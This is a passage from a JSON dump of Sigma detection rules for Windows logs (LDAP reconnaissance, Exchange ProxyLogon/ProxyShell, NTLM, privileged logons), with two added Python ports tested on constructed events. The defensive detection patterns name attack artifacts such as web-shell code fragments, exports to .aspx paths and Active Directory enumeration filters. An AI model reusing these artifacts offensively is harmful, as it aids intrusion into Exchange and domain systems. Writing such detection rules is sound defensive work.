   - 'DirectoryListingModule'\n            - 'FileCacheModule'\n            - 'HttpCacheModule'\n            - 'HttpLoggingModule'\n            - 'ProtocolSupportModule'\n            - 'RequestFilteringModule'\n            - 'StaticCompressionModule'\n            - 'StaticFileModule'\n            - 'TokenCacheModule'\n            - 'UriCacheModule'\n    filter_main_remove:\n        NewValue: ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/iis-configuration/win_iis_module_removed.yml",
    "content": "title: Previously Installed IIS Module Was Removed\nid: 9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f\nstatus: test\ndescription: Detects the removal of a previously installed IIS module.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis\n    - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n    - https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\n    - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview\nauthor: Nasreddine Bencherchali\ndate: 2024-10-06\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1562.002\n    - attack.t1505.004\nlogsource:\n    product: windows\n    service: iis-configuration\ndetection:\n    selection:\n        EventID: 29\n        Configuration|contains: '/system.webServer/modules/remove'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\n# Note: Upgrade after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/ldap/win_ldap_recon.yml",
    "content": "title: Potential Active Directory Reconnaissance/Enumeration Via LDAP\nid: 31d68132-4038-47c7-8f8e-635a39a7c174\nstatus: test\ndescription: Detects potential Active Directory enumeration via LDAP\nreferences:\n    - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726\n    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1\n    - https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs\n    - https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c\n    - https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427\n    - https://ipurple.team/2024/07/15/sharphound-detection/\nauthor: Adeem Mawani\ndate: 2021-06-22\nmodified: 2025-07-04\ntags:\n    - attack.discovery\n    - attack.t1069.002\n    - attack.t1087.002\n    - attack.t1482\nlogsource:\n    product: windows\n    service: ldap\n    definition: 'Requirements: Microsoft-Windows-LDAP-Client/Debug ETW logging'\ndetection:\n    generic_search:\n        EventID: 30\n        SearchFilter|contains:\n            - '(groupType:1.2.840.113556.1.4.803:=2147483648)'\n            - '(groupType:1.2.840.113556.1.4.803:=2147483656)'\n            - '(groupType:1.2.840.113556.1.4.803:=2147483652)'\n            - '(groupType:1.2.840.113556.1.4.803:=2147483650)'\n            - '(sAMAccountType=805306369)'\n            - '(sAMAccountType=805306368)'\n            - '(sAMAccountType=536870913)'\n            - '(sAMAccountType=536870912)'\n            - '(sAMAccountType=268435457)'\n            - '(sAMAccountType=268435456)'\n            - '(objectCategory=groupPolicyContainer)'\n            - '(objectCategory=organizationalUnit)'\n            # - '(objectCategory=Computer)' Prone to false positives\n            - '(objectCategory=nTDSDSA)'\n            - '(objectCategory=server)'\n            - '(objectCategory=domain)'\n            - '(objectCategory=person)'\n            - '(objectCategory=group)'\n            - '(objectCategory=user)'\n            - '(objectClass=trustedDomain)'\n            - '(objectClass=computer)'\n            - '(objectClass=server)'\n            - '(objectClass=group)'\n            - '(objectClass=user)'\n            - '(primaryGroupID=521)'\n            - '(primaryGroupID=516)'\n            - '(primaryGroupID=515)'\n            - '(primaryGroupID=512)'\n            - 'Domain Admins'\n            - 'objectGUID=\\*'\n            - '(schemaIDGUID=\\*)'\n            - 'admincount=1'\n    distinguished_name_enumeration:\n        EventID: 30\n        SearchFilter: '(objectclass=\\*)'\n        DistinguishedName|contains:\n            - 'CN=Domain Admins'\n            - 'CN=Enterprise Admins'\n            - 'CN=Group Policy Creator Owners'\n    suspicious_flag:\n        EventID: 30\n        SearchFilter|contains:\n            - '(userAccountControl:1.2.840.113556.1.4.803:=4194304)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=2097152)'\n            - '!(userAccountControl:1.2.840.113556.1.4.803:=1048574)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=524288)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=65536)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=8192)'\n            - '(userAccountControl:1.2.840.113556.1.4.803:=544)'\n            - '!(UserAccountControl:1.2.840.113556.1.4.803:=2)'\n            - 'msDS-AllowedToActOnBehalfOfOtherIdentity'\n            - 'msDS-AllowedToDelegateTo'\n            - 'msDS-GroupManagedServiceAccount'\n            - '(accountExpires=9223372036854775807)'\n            - '(accountExpires=0)'\n            - '(adminCount=1)'\n            - 'ms-MCS-AdmPwd'\n    narrow_down_filter:\n        EventID: 30\n        SearchFilter|contains:\n            - '(domainSid=*)'\n            - '(objectSid=*)'\n    condition: (generic_search and not narrow_down_filter) or suspicious_flag or distinguished_name_enumeration\nlevel: medium\n"
  },
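Sigma values are not plain substrings: an unescaped `*` is a wildcard while `\*` is a literal asterisk. That is why `(objectSid=*)` in `narrow_down_filter` matches any lookup scoped to a single object, whereas `(objectclass=\*)` in `distinguished_name_enumeration` matches only the literal filter `(objectclass=*)`. The block below is an added example, not code from the Sigma project: it implements that value-to-regex translation plus the rule's three-part condition and runs it over constructed EventID 30 records. The value lists are subsets of the rule's; the search filters, SIDs and `DC=corp,DC=example` are made up.

```python
"""Added example (not code from the Sigma project): the LDAP reconnaissance
rule above, ported by hand with Sigma's string semantics. Sample events are
constructed, not captured Microsoft-Windows-LDAP-Client/Debug events."""
import re


# Sigma value -> compiled regex. Unescaped '*' and '?' are wildcards; '\*',
# '\?' and '\\' are literals; everything else is literal. Matching is
# case-insensitive and, without a modifier, anchored on both ends (exact match).
def sigma_regex(value, modifier=None):
    out, i = [], 0
    while i < len(value):
        c = value[i]
        if c == "\\" and i + 1 < len(value) and value[i + 1] in "*?\\":
            out.append(re.escape(value[i + 1]))   # escaped wildcard/backslash -> literal
            i += 2
            continue
        out.append({"*": ".*", "?": "."}.get(c, re.escape(c)))
        i += 1
    body = "".join(out)
    if modifier == "contains":
        body = ".*" + body + ".*"
    elif modifier == "startswith":
        body += ".*"
    elif modifier == "endswith":
        body = ".*" + body
    return re.compile("^" + body + "$", re.IGNORECASE | re.DOTALL)


def matches_any(field_value, values, modifier=None):
    """Sigma list semantics: the field matches if any listed value matches."""
    if field_value is None:
        return False
    return any(sigma_regex(v, modifier).search(field_value) for v in values)


# Subsets of the value lists in the rule above (the full lists are longer).
GENERIC_SEARCH = [
    "(sAMAccountType=805306368)", "(objectCategory=groupPolicyContainer)",
    "(objectCategory=person)", "(objectClass=trustedDomain)", "(primaryGroupID=512)",
    "objectGUID=\\*", "admincount=1",
]
SUSPICIOUS_FLAG = [
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304)",
    "!(UserAccountControl:1.2.840.113556.1.4.803:=2)",
    "msDS-AllowedToDelegateTo", "ms-MCS-AdmPwd",
]
NARROW_DOWN = ["(domainSid=*)", "(objectSid=*)"]     # unescaped '*' -> wildcard
DN_ENUM_FILTER = "(objectclass=\\*)"                   # escaped '\*' -> literal asterisk
DN_ENUM_TARGETS = ["CN=Domain Admins", "CN=Enterprise Admins", "CN=Group Policy Creator Owners"]


def ldap_recon(ev):
    """(generic_search and not narrow_down_filter) or suspicious_flag or distinguished_name_enumeration"""
    if ev.get("EventID") != 30:
        return False
    flt, dn = ev.get("SearchFilter"), ev.get("DistinguishedName")
    generic = matches_any(flt, GENERIC_SEARCH, "contains")
    narrowed = matches_any(flt, NARROW_DOWN, "contains")
    suspicious = matches_any(flt, SUSPICIOUS_FLAG, "contains")
    dn_enum = matches_any(flt, [DN_ENUM_FILTER]) and matches_any(dn, DN_ENUM_TARGETS, "contains")
    return (generic and not narrowed) or suspicious or dn_enum


# Constructed events (not real telemetry); the comment says why each does or does not fire.
SAMPLE_EVENTS = [
    {"EventID": 30, "SearchFilter": "(samaccounttype=805306368)"},                                  # 0: all users, case differs -> fires
    {"EventID": 30, "SearchFilter": "(&(sAMAccountType=805306368)(objectSid=S-1-5-21-1-2-3-1105))"},  # 1: one object -> narrow_down suppresses
    {"EventID": 30, "SearchFilter": "(&(objectSid=S-1-5-21-1-2-3-500)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"},  # 2: narrowed, but suspicious_flag ignores the narrow-down filter
    {"EventID": 30, "SearchFilter": "(objectclass=*)", "DistinguishedName": "CN=Domain Admins,CN=Users,DC=corp,DC=example"},  # 3: literal '*' + privileged DN -> fires
    {"EventID": 30, "SearchFilter": "(objectclass=top)", "DistinguishedName": "CN=Domain Admins,CN=Users,DC=corp,DC=example"},  # 4: '\*' is literal, so no wildcard match
    {"EventID": 31, "SearchFilter": "(sAMAccountType=805306368)"},                                    # 5: wrong event id
]


def run(events):
    """Indices of the events the rule would alert on."""
    return [i for i, ev in enumerate(events) if ldap_recon(ev)]


if __name__ == "__main__":
    print(run(SAMPLE_EVENTS))
```

Events 1 and 2 are the pair worth noting when tuning: the `narrow_down_filter` only suppresses the broad `generic_search` branch, so a single-object lookup that also carries a `userAccountControl` flag from `suspicious_flag` still alerts.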
  {
    "path": "rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml",
    "content": "title: Standard User In High Privileged Group\nid: 7ac407cc-0f48-4328-aede-de1d2e6fef41\nstatus: test\ndescription: Detects logons by standard users that are part of high privileged groups such as the Administrators group\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers\n    - https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml\nauthor: frack113\ndate: 2023-01-13\nmodified: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: lsa-server\n    definition: 'Requirements: Microsoft-Windows-LSA/Operational (199FE037-2B82-40A9-82AC-E1D46C792B99) Event Log must be enabled and collected in order to use this rule.'\ndetection:\n    selection:\n        EventID: 300\n        TargetUserSid|startswith: 'S-1-5-21-' # Standard user\n        SidList|contains:\n            - 'S-1-5-32-544'    # Local admin\n            - '-500}'           # Built-in Administrator account\n            - '-518}'           # Schema admin\n            - '-519}'           # Enterprise admin\n    filter_main_admin:\n        TargetUserSid|endswith:\n            - '-500'           # Built-in Administrator account\n            - '-518'           # Schema admin\n            - '-519'           # Enterprise admin\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Standard domain users who are part of the administrator group.\n      These users shouldn't have these rights. In the cases where it's necessary, they should be filtered out using the \"TargetUserName\" field\nlevel: medium\n"
  },
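The rule above keys entirely on SIDs: the logon target must be a domain or local account (`S-1-5-21-` prefix), its token must carry a privileged SID, and `filter_main_admin` removes the privileged principals themselves (RID 500, 518, 519), whose own SID would otherwise satisfy the `SidList` match. The block below is an added example, not code from the Sigma project: it ports that logic to Python and applies the `TargetUserName` allow-list the rule's false-positive note suggests. The brace-wrapped `SidList` layout is assumed from the rule's `-500}` style patterns, and the domain SID, RIDs and user names are constructed.

```python
"""Added example (not code from the Sigma project): the 'Standard User In High
Privileged Group' rule above, ported by hand. The SidList layout (brace-wrapped
SIDs) is assumed from the rule's '-500}' patterns; the events are constructed,
not captured Microsoft-Windows-LSA/Operational records."""

# Well-known identifiers referenced by the rule.
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"   # BUILTIN\Administrators
PRIVILEGED_RIDS = ("500", "518", "519")    # built-in Administrator account, Schema Admins, Enterprise Admins
DOMAIN_SID_PREFIX = "S-1-5-21-"            # domain or local account SIDs


def _contains_any(value, needles):
    # Sigma string matching is case-insensitive; a missing field never matches.
    return value is not None and any(n.lower() in value.lower() for n in needles)


def standard_user_in_privileged_group(ev):
    """selection and not filter_main_admin."""
    if ev.get("EventID") != 300:
        return False
    target_sid, sid_list = ev.get("TargetUserSid"), ev.get("SidList")
    needles = [BUILTIN_ADMINISTRATORS] + [f"-{rid}}}" for rid in PRIVILEGED_RIDS]   # '-500}' etc.
    selection = (target_sid is not None and target_sid.startswith(DOMAIN_SID_PREFIX)
                 and _contains_any(sid_list, needles))
    # The privileged principals always carry their own SID in the list, so the
    # rule drops them by RID and keeps only ordinary users with elevated groups.
    filter_main_admin = (target_sid is not None
                         and target_sid.endswith(tuple(f"-{rid}" for rid in PRIVILEGED_RIDS)))
    return selection and not filter_main_admin


# Constructed domain SID and events (not real telemetry).
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_EVENTS = [
    # 0: ordinary user (RID 1105) whose token carries BUILTIN\Administrators -> fires
    {"EventID": 300, "TargetUserSid": f"{DOMAIN}-1105", "TargetUserName": "jdoe",
     "SidList": f"{{S-1-5-32-545}} {{S-1-5-32-544}} {{{DOMAIN}-513}}"},
    # 1: ordinary user whose token carries Enterprise Admins (RID 519) -> fires
    {"EventID": 300, "TargetUserSid": f"{DOMAIN}-1106", "TargetUserName": "asmith",
     "SidList": f"{{S-1-5-32-545}} {{{DOMAIN}-513}} {{{DOMAIN}-519}}"},
    # 2: the built-in Administrator account itself (RID 500) -> filter_main_admin
    {"EventID": 300, "TargetUserSid": f"{DOMAIN}-500", "TargetUserName": "Administrator",
     "SidList": f"{{S-1-5-32-544}} {{{DOMAIN}-512}} {{{DOMAIN}-500}}"},
    # 3: ordinary user, Domain Users only -> no
    {"EventID": 300, "TargetUserSid": f"{DOMAIN}-1107", "TargetUserName": "bwong",
     "SidList": f"{{S-1-5-32-545}} {{{DOMAIN}-513}}"},
    # 4: LocalSystem, not a domain/local account SID -> no
    {"EventID": 300, "TargetUserSid": "S-1-5-18", "TargetUserName": "SYSTEM",
     "SidList": "{S-1-5-32-544} {S-1-1-0}"},
]


def run(events, allowlist=frozenset()):
    """(index, TargetUserName) for each hit, minus allow-listed names, as the
    rule's false-positive note recommends."""
    return [(i, ev.get("TargetUserName")) for i, ev in enumerate(events)
            if standard_user_in_privileged_group(ev) and ev.get("TargetUserName") not in allowlist]


if __name__ == "__main__":
    print(run(SAMPLE_EVENTS))
    print(run(SAMPLE_EVENTS, allowlist={"asmith"}))
```

Note that `-500}` needs the hyphen and the closing brace, so a RID such as 1500 does not match; keep that in mind if your collector emits the SID list in a different shape, since the suffix match then silently stops working.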
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml",
    "content": "title: ProxyLogon MSExchange OabVirtualDirectory\nid: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0\nstatus: test\ndescription: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory\nreferences:\n    - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-01-23\ntags:\n    - attack.t1587.001\n    - attack.resource-development\nlogsource:\n    product: windows\n    service: msexchange-management\ndetection:\n    keywords_cmdlet:\n        '|all':\n            - 'OabVirtualDirectory'\n            - ' -ExternalUrl '\n    keywords_params:\n        - 'eval(request'\n        - 'http://f/<script'\n        - '\"unsafe\"};'\n        - 'function Page_Load()'\n    condition: keywords_cmdlet and keywords_params\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml",
    "content": "title: Certificate Request Export to Exchange Webserver\nid: b7bc7038-638b-4ffd-880c-292c692209ef\nstatus: test\ndescription: Detects a write of an Exchange CSR to an untypical directory or with an .aspx name suffix, which can be used to place a webshell\nreferences:\n    - https://twitter.com/GossiTheDog/status/1429175908905127938\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-01-23\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    service: msexchange-management\n    product: windows\ndetection:\n    keywords_export_command:\n        '|all':\n            - 'New-ExchangeCertificate'\n            - ' -GenerateRequest'\n            - ' -BinaryEncoded'\n            - ' -RequestFile'\n    keywords_export_params:\n        - '\\\\\\\\localhost\\\\C$'\n        - '\\\\\\\\127.0.0.1\\\\C$'\n        - 'C:\\\\inetpub'\n        - '.aspx'\n    condition: keywords_export_command and keywords_export_params\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml",
    "content": "title: Mailbox Export to Exchange Webserver\nid: 516376b4-05cd-4122-bae0-ad7641c38d48\nstatus: test\ndescription: Detects a successful export of an Exchange mailbox to an untypical directory or with an .aspx name suffix, which can be used to place a webshell, or the role assignment needed for it\nreferences:\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\nauthor: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-04-30\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    service: msexchange-management\n    product: windows\ndetection:\n    export_command:\n        '|all':\n            - 'New-MailboxExportRequest'\n            - ' -Mailbox '\n    export_params:\n        - '-FilePath \"\\\\\\\\' # We care about any share location.\n        - '.aspx'\n    role_assignment:\n        '|all':\n            - 'New-ManagementRoleAssignment'\n            - ' -Role \"Mailbox Import Export\"'\n            - ' -User '\n    condition: (export_command and export_params) or role_assignment\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml",
    "content": "title: Remove Exported Mailbox from Exchange Webserver\nid: 09570ae5-889e-43ea-aac0-0e1221fb3d95\nstatus: test\ndescription: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit\nreferences:\n    - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-27\nmodified: 2023-01-23\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    service: msexchange-management\n    product: windows\ndetection:\n    keywords:\n        '|all':\n            - 'Remove-MailboxExportRequest'\n            - ' -Identity '\n            - ' -Confirm \"False\"'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml",
    "content": "title: Exchange Set OabVirtualDirectory ExternalUrl Property\nid: 9db37458-4df2-46a5-95ab-307e7f29e675\nstatus: test\ndescription: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log\nreferences:\n    - https://twitter.com/OTR_Community/status/1371053369071132675\nauthor: Jose Rodriguez @Cyb3rPandaH\ndate: 2021-03-15\nmodified: 2023-01-23\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    service: msexchange-management\ndetection:\n    keywords:\n        '|all':\n            - 'Set-OabVirtualDirectory'\n            - 'ExternalUrl'\n            - 'Page_Load'\n            - 'script'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_transportagent.yml",
    "content": "title: MSExchange Transport Agent Installation - Builtin\nid: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6\nrelated:\n    - id: 83809e84-4475-4b69-bc3e-4aad8568612f\n      type: derived\nstatus: test\ndescription: Detects the installation of an Exchange Transport Agent\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-08\nmodified: 2022-11-27\ntags:\n    - attack.persistence\n    - attack.t1505.002\nlogsource:\n    product: windows\n    service: msexchange-management\ndetection:\n    selection:\n        - 'Install-TransportAgent'\n    condition: selection\nfalsepositives:\n    - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml",
    "content": "title: Failed MSExchange Transport Agent Installation\nid: c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa\nstatus: test\ndescription: Detects a failed installation of an Exchange Transport Agent\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-08\nmodified: 2022-07-12\ntags:\n    - attack.persistence\n    - attack.t1505.002\nlogsource:\n    service: msexchange-management\n    product: windows\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        EventID: 6\n        Data|contains: 'Install-TransportAgent'\n    condition: selection\nfalsepositives:\n    - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml",
    "content": "title: NTLM Logon\nid: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b\nstatus: test\ndescription: Detects logons using NTLM, which could be caused by a legacy source or attackers\nreferences:\n    - https://twitter.com/JohnLaTwC/status/1004895028995477505\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-08\nmodified: 2024-07-22\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: ntlm\n    definition: Requires events from Microsoft-Windows-NTLM/Operational\ndetection:\n    selection:\n        EventID: 8002\n    condition: selection\nfalsepositives:\n    - Legacy hosts\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml",
    "content": "title: NTLM Brute Force\nid: 9c8acf1a-cbf9-4db6-b63c-74baabe03e59\nstatus: test\ndescription: Detects common NTLM brute force device names\nreferences:\n    - https://www.varonis.com/blog/investigate-ntlm-brute-force\nauthor: Jerry Shockley '@jsh0x'\ndate: 2022-02-02\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: windows\n    service: ntlm\n    definition: Requires events from Microsoft-Windows-NTLM/Operational\ndetection:\n    selection:\n        EventID: 8004\n    devicename:\n        WorkstationName:\n            - 'Rdesktop'\n            - 'Remmina'\n            - 'Freerdp'\n            - 'Windows7'\n            - 'Windows8'\n            - 'Windows2012'\n            - 'Windows2016'\n            - 'Windows2019'\n    condition: selection and devicename\nfalsepositives:\n    - Systems with names equal to the spoofed ones used by the brute force tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml",
    "content": "title: Potential Remote Desktop Connection to Non-Domain Host\nid: ce5678bb-b9aa-4fb5-be4b-e57f686256ad\nstatus: test\ndescription: Detects logons using NTLM to hosts that are potentially not part of the domain.\nreferences:\n    - n/a\nauthor: James Pemberton\ndate: 2020-05-22\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    service: ntlm\n    definition: Requires events from Microsoft-Windows-NTLM/Operational\ndetection:\n    selection:\n        EventID: 8001\n        TargetName|startswith: 'TERMSRV'\n    condition: selection\nfalsepositives:\n    - Host connections to valid domains, exclude these.\n    - Host connections not using host FQDN.\n    - Host connections to external legitimate domains.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml",
    "content": "title: OpenSSH Server Listening On Socket\nid: 3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781\nstatus: test\ndescription: Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket.\nreferences:\n    - https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH\n    - https://winaero.com/enable-openssh-server-windows-10/\n    - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse\n    - https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx\n    - https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nauthor: mdecrevoisier\ndate: 2022-10-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.004\nlogsource:\n    product: windows\n    service: openssh\ndetection:\n    selection:\n        EventID: 4\n        process: sshd\n        payload|startswith: 'Server listening on '\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml",
    "content": "title: Potential Access Token Abuse\nid: 02f7c9c1-1ae8-4c6a-8add-04693807f92f\nstatus: test\ndescription: Detects potential token impersonation and theft. For example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS\" flag.\nreferences:\n    - https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation\n    - https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html\nauthor: Michaela Adams, Zach Mathis\ndate: 2022-11-06\nmodified: 2023-04-26\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - stp.4u\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n        LogonProcessName: 'Advapi'\n        AuthenticationPackageName: 'Negotiate'\n        ImpersonationLevel: '%%1833' # Impersonation\n    condition: selection\nfalsepositives:\n    - Anti-Virus\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml",
    "content": "title: Admin User Remote Logon\nid: 0f63e1ef-1eb9-4226-9d54-8927ca08520a\nstatus: test\ndescription: Detects remote logons by administrator users (depending on the internal naming pattern).\nreferences:\n    - https://car.mitre.org/wiki/CAR-2016-04-005\nauthor: juju4\ndate: 2017-10-29\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.initial-access\n    - attack.t1078.001\n    - attack.t1078.002\n    - attack.t1078.003\n    - car.2016-04-005\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: \"Admin-*\"), internal policy mandating use only as secondary account'\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 10\n        AuthenticationPackageName: Negotiate\n        TargetUserName|startswith: 'Admin'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity.\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml",
    "content": "title: DiagTrackEoP Default Login Username\nid: 2111118f-7e46-4fc8-974a-59fd8ec95196\nstatus: test\ndescription: Detects the default \"UserName\" used by the DiagTrackEoP POC\nreferences:\n    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-03\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 9\n        TargetOutboundUserName: 'thisisnotvaliduser'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml",
    "content": "title: A Member Was Added to a Security-Enabled Global Group\nid: c43c26be-2e87-46c7-8661-284588c5a53e\nrelated:\n    - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e\n      type: obsolete\nstatus: stable\ndescription: Detects activity when a member is added to a security-enabled global group\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2023-04-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4728 # A member was added to a security-enabled global group\n            - 632 # Security Enabled Global Group Member Added\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml",
